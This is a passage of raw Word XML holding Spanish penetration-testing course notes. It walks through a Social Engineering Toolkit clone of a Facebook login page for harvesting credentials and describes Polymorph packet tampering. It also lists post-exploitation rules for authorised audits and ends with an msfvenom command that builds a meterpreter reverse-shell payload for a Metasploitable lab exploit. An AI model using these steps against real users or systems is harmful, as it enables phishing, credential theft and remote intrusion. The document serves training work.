          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C06B7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>HSTS preloaded list consiste en una lista de dominios que el navegador incluye en su propio código fuente y obliga a que cuando el usuario se conecte a ellos la conexión vaya siempre por https. Aunque pongamos http en el navegador, te redirigirá a https automáticamente. Como </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="007C06B7">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:color w:val="0070C0"/>
          </w:rPr>
          <w:t>facebook.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C06B7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es uno de estos dominios, no iba a funcionar ya que no disponemos del certificado original de facebook. Para comprobar los dominios de esta lista, podemos usar la web: </w:t>
      </w:r>
      <w:r w:rsidR="007C06B7" w:rsidRPr="007C06B7">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C06B7" w:rsidRPr="007C06B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>hstspreload.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD09621" w14:textId="45640F7F" w:rsidR="00E92449" w:rsidRPr="007C06B7" w:rsidRDefault="00E92449" w:rsidP="007C06B7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Recuerda que esta técnica no tiene utilidad si hay certificados de por medio (https) y por lo tanto puede ser detectada si se intenta sobre un sitio que se encuentre en el HSTS preloaded list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9E7C3D" w14:textId="33D60AC9" w:rsidR="007C06B7" w:rsidRPr="00E92449" w:rsidRDefault="00E92449" w:rsidP="00E92449">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Social Engineering Toolkit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92449">
        <w:t>Herramienta para ingeniería social</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para replicar una página web original de manera exacta</w:t>
      </w:r>
      <w:r w:rsidR="00D3791B">
        <w:t xml:space="preserve"> para posteriormente recoger las credenciales del usuario.</w:t>
      </w:r>
      <w:r w:rsidR="007A3BD9">
        <w:t xml:space="preserve"> Debemos combinarla con el </w:t>
      </w:r>
      <w:r w:rsidR="007A3BD9" w:rsidRPr="007A3BD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DNS Spoofing</w:t>
      </w:r>
      <w:r w:rsidR="007A3BD9">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124E148" w14:textId="455BFA40" w:rsidR="00E92449" w:rsidRDefault="00E92449" w:rsidP="00E92449">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92449">
        <w:t xml:space="preserve">Se abre con:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92449">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo setoolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A478D" w14:textId="013B6D1F" w:rsidR="00D3791B" w:rsidRDefault="00D3791B" w:rsidP="00E92449">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3791B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Social-Engineering Attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3791B">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3791B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Website Attack Vectors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3791B">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3791B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Jacking Attack Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5E4FF" w14:textId="08469A9F" w:rsidR="00D3791B" w:rsidRDefault="00D3791B" w:rsidP="00E92449">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3791B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom Import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, pulsamos enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AB50E7" w14:textId="3561F9CF" w:rsidR="00D3791B" w:rsidRPr="00D3791B" w:rsidRDefault="00D3791B" w:rsidP="00E92449">
      <w:r w:rsidRPr="00D3791B">
        <w:t>En este punto, nos dirigimos a la página real que queramos copiar, y la guardamos, pero solo el html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con el nombre de </w:t>
      </w:r>
      <w:r w:rsidRPr="00D3791B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3791B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AFB93C" w14:textId="16CA985C" w:rsidR="00D3791B" w:rsidRDefault="00D3791B" w:rsidP="00E32AD2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3791B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7543CC89" wp14:editId="1C802A56">
            <wp:extent cx="5400040" cy="318897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188970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96F59F" w14:textId="77777777" w:rsidR="00E92449" w:rsidRDefault="00E92449" w:rsidP="0094192F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79527ADB" w14:textId="1802DB89" w:rsidR="007C06B7" w:rsidRDefault="00D3791B" w:rsidP="007C06B7">
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="007A3BD9">
        <w:t>continuación,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ponemos la ruta</w:t>
      </w:r>
      <w:r w:rsidR="00E32AD2">
        <w:t xml:space="preserve">, en nuestro caso </w:t>
      </w:r>
      <w:r w:rsidR="00E32AD2" w:rsidRPr="00E32AD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/home/Kali/Desktop/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443C7E91" w14:textId="053805E3" w:rsidR="00D3791B" w:rsidRDefault="00E32AD2" w:rsidP="00E32AD2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E32AD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F8E8B37" wp14:editId="19A9DFD8">
            <wp:extent cx="5400040" cy="55562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555625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51469215" w14:textId="346110EC" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7">
      <w:r>
        <w:t>Podemos volver a pulsar enter para dejar la URL por defecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD30328" w14:textId="06789396" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7">
      <w:r>
        <w:t>Si tenemos apache o nginx por ejemplo, nos solicitará que lo desactivemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC28E39" w14:textId="40BB8191" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7">
      <w:r w:rsidRPr="00E32AD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B7DBEE" wp14:editId="1EB27EE9">
            <wp:extent cx="5400040" cy="128460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284605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466781B" w14:textId="1A1A9B3F" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7"/>
    <w:p w14:paraId="4C071A77" w14:textId="478F305B" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7"/>
    <w:p w14:paraId="5B3EE6D4" w14:textId="164C7F26" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7">
      <w:r>
        <w:t>El resultado es este, deberíamos haber puesto facebook.es para que el mensaje dijera “The site http://facebook.es.....”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E989FF" w14:textId="454A749F" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7">
      <w:r w:rsidRPr="00E32AD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0120D649" wp14:editId="672D1315">
            <wp:extent cx="5400040" cy="156591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565910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468DDD0" w14:textId="52C6EEEB" w:rsidR="006D59EB" w:rsidRDefault="006D59EB" w:rsidP="007C06B7">
      <w:r>
        <w:t>SI hubiéramos puesto URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C89E10" w14:textId="7B01070A" w:rsidR="006D59EB" w:rsidRDefault="006D59EB" w:rsidP="007C06B7">
      <w:r w:rsidRPr="006D59EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71780CDB" wp14:editId="0D4702D2">
            <wp:extent cx="5400040" cy="791845"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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791845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01359EFF" w14:textId="7843F247" w:rsidR="00E32AD2" w:rsidRDefault="00E32AD2" w:rsidP="007C06B7">
      <w:r>
        <w:t>Al pulsar, llega a una página clónica de Facebook:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B28345" w14:textId="1598CE71" w:rsidR="006D59EB" w:rsidRDefault="006D59EB" w:rsidP="007C06B7">
      <w:r w:rsidRPr="006D59EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22347B00" wp14:editId="00C4C918">
            <wp:extent cx="5400040" cy="3693795"/>
            <wp:effectExtent l="0" t="0" r="0" b="190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693795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A60E66B" w14:textId="593AA43D" w:rsidR="006D59EB" w:rsidRDefault="006D59EB" w:rsidP="007C06B7">
      <w:r w:rsidRPr="00E32AD2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B5C8B99" wp14:editId="5255B4F9">
            <wp:extent cx="3726179" cy="1035416"/>
            <wp:effectExtent l="0" t="0" r="825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31143" cy="1036795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6BAC2" w14:textId="614CA4F5" w:rsidR="002D1A64" w:rsidRPr="003A0618" w:rsidRDefault="000D05B7" w:rsidP="002D1A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A0618">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Polymorph:</w:t>
      </w:r>
      <w:r w:rsidR="003A0618">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D1A64" w:rsidRPr="002D1A64">
        <w:t>Polymorph es una herramienta creada por Santiago Hernández (a.k.a. shramos)</w:t>
      </w:r>
      <w:r w:rsidR="002D1A64">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D372904" w14:textId="52991CE7" w:rsidR="000D05B7" w:rsidRPr="002D1A64" w:rsidRDefault="000D05B7" w:rsidP="002D1A64">
      <w:r w:rsidRPr="002D1A64">
        <w:t>Es posible que sea necesario instalar Anaconda 3 debido a las constantes actualizaciones de Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB0A05" w14:textId="3E582CA4" w:rsidR="000D05B7" w:rsidRDefault="001142D0" w:rsidP="002D1A64">
      <w:r w:rsidRPr="002D1A64">
        <w:t>La diferencia principal con el DNS Spoofing a la Manipulación de Tráfico de Red en Tiempo Real es que antes simplemente éramos un MITM qué escuchaba y como mucho, inducía a que un usuario nos revelara sus credenciales. Sin embargo, manipular paquetes conlleva modificar sustancialmente las peticiones de red.</w:t>
      </w:r>
      <w:r w:rsidR="009609E1" w:rsidRPr="002D1A64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5545C" w14:textId="4BC75A0E" w:rsidR="002D1A64" w:rsidRDefault="002D1A64" w:rsidP="002D1A64">
      <w:r>
        <w:t>Con Polymorph somos capaces, no de simplemente interceptar copias de los paquetes, como hace Wireshark, sino de interceptarlos y modificarlos en tiempo real, por lo que podríamos modificar paquetes a la entrada y la salida sin que nadie se percatara de ello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6A6B9" w14:textId="29C828CB" w:rsidR="007B32B9" w:rsidRPr="002D1A64" w:rsidRDefault="007B32B9" w:rsidP="002D1A64">
      <w:r>
        <w:t>Interesante vídeo de cómo se realiza una modificación de paquetes en el Registro de Windows con la inyección de un payload en el registro y posteriormente ejecución de un meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B0EB2" w14:textId="443DD865" w:rsidR="00E32AD2" w:rsidRDefault="00000000" w:rsidP="007C06B7">
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="007B32B9" w:rsidRPr="00670590">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://vimeo.com/249060325</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13A37FC6" w14:textId="77777777" w:rsidR="004C1C3D" w:rsidRDefault="004C1C3D" w:rsidP="007C06B7"/>
    <w:p w14:paraId="4A62F068" w14:textId="63095A46" w:rsidR="004C1C3D" w:rsidRPr="004C1C3D" w:rsidRDefault="004C1C3D" w:rsidP="004C1C3D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Técnicas de Post-Explotación</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1C3D">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6E5BB" w14:textId="58AA570E" w:rsidR="007B32B9" w:rsidRDefault="004C1C3D" w:rsidP="004C1C3D">
      <w:r>
        <w:t>La fase de post-explotación consiste en determinar el valor del sistema comprometido, en base a dos variables</w:t>
      </w:r>
      <w:r w:rsidR="00797B5E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4382B37B" w14:textId="4E8384E8" w:rsidR="004C1C3D" w:rsidRDefault="004C1C3D" w:rsidP="004C1C3D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lo sensible que sea, si tuviera información confidencial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E9113" w14:textId="4C53E27A" w:rsidR="004C1C3D" w:rsidRDefault="004C1C3D" w:rsidP="004C1C3D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capacidad del activo para conectarse y comprometer otros activos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49244D9E" w14:textId="19DA90DA" w:rsidR="004C1C3D" w:rsidRDefault="00797B5E" w:rsidP="004C1C3D">
      <w:r>
        <w:t>Son técnicas muy intrusivas y la mayoría de los clientes no quieren que sean ejecutadas pues puede caer distintos sistemas de la organización y ya es suficiente con comprometer las máquinas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3A9B9" w14:textId="6364EDDF" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="004C1C3D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00797B5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Recomendaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32066293" w14:textId="43D4AE85" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A no ser que exista una petición expresa, no deben evaluarse ni modificarse servicios considerados críticos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513805B9" w14:textId="3F3A7096" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Las modificaciones deben ser documentados y pueden ser revertidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFDFB44" w14:textId="0E244AD9" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Se debe entregar una lista detallad de todas las acciones tomadas y el período de tiempo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21581045" w14:textId="45BAB996" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Toda la información privada o personal que se descubra puede ser utilizada para obtener información adicional, solo si se tiene autorización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E7999" w14:textId="56B57362" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Las contraseñas NO DEBEN SER ADJUNTADAS, ni siquiera cifradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A184D72" w14:textId="344AB2ED" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No establecer mecanismos de persistencia en una máquina sin el consentimiento del cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BEF8A7" w14:textId="696B5730" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Toda la información recolectada durante la auditoría debe estar cifrada en los equipos de los analistas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FCC658" w14:textId="5A043E57" w:rsidR="00797B5E" w:rsidRDefault="00797B5E" w:rsidP="00797B5E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TODA la información recopilada debe ser destruida una vez que el cliente acepte el reporte final.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD87954" w14:textId="084CC3DD" w:rsidR="002A7A47" w:rsidRDefault="002A7A47" w:rsidP="002A7A47"/>
    <w:p w14:paraId="0402BB59" w14:textId="77D9F270" w:rsidR="002A7A47" w:rsidRDefault="002A7A47" w:rsidP="002A7A47"/>
    <w:p w14:paraId="7F3699DC" w14:textId="05B40B57" w:rsidR="002A7A47" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux Meterpreter Post-explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6723BF60" w14:textId="411841F2" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="00171070">
      <w:r>
        <w:t>Antes de empezar, debemos haber encontrado una vulnerabilidad en el host, aquí vamos a suponer que hemos decidido descargar un exploit para UnrealIRC que ya sabemos que nuestro Ubuntu Metasploiteable es vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA6CA30" w14:textId="15E6B8D7" w:rsidR="00171070" w:rsidRPr="00171070" w:rsidRDefault="00171070" w:rsidP="00171070">
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F4DD7D0" wp14:editId="5B47F3D7">
            <wp:extent cx="5400040" cy="205803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058035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C1A46A" w14:textId="44F12C48" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:r>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r w:rsidRPr="00C70EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podemos crear un payload con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733CB0A0" w14:textId="4E5BD3A0" w:rsidR="00171070" w:rsidRPr="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sfvenom -p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ython/meterpreter/reverse_tcp lhost=192.168.52.128 lport=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBE6491" w14:textId="72626C93" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="417E8272" wp14:editId="76430F6F">
            <wp:extent cx="5400040" cy="717550"/>
            <wp:effectExtent l="0" t="0" r="0"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717550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F261D73" w14:textId="0156F2D9" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:r>
        <w:t>Vamos a sustituir el payload que traía originalmente este exploit por el payload actual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF1052" w14:textId="2DC56559" w:rsidR="00171070" w:rsidRDefault="00171070" w:rsidP="002A7A47">
      <w:r w:rsidRPr="00171070">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BFD2A2" wp14:editId="599B16C5">
            <wp:extent cx="5400040" cy="1042670"/>
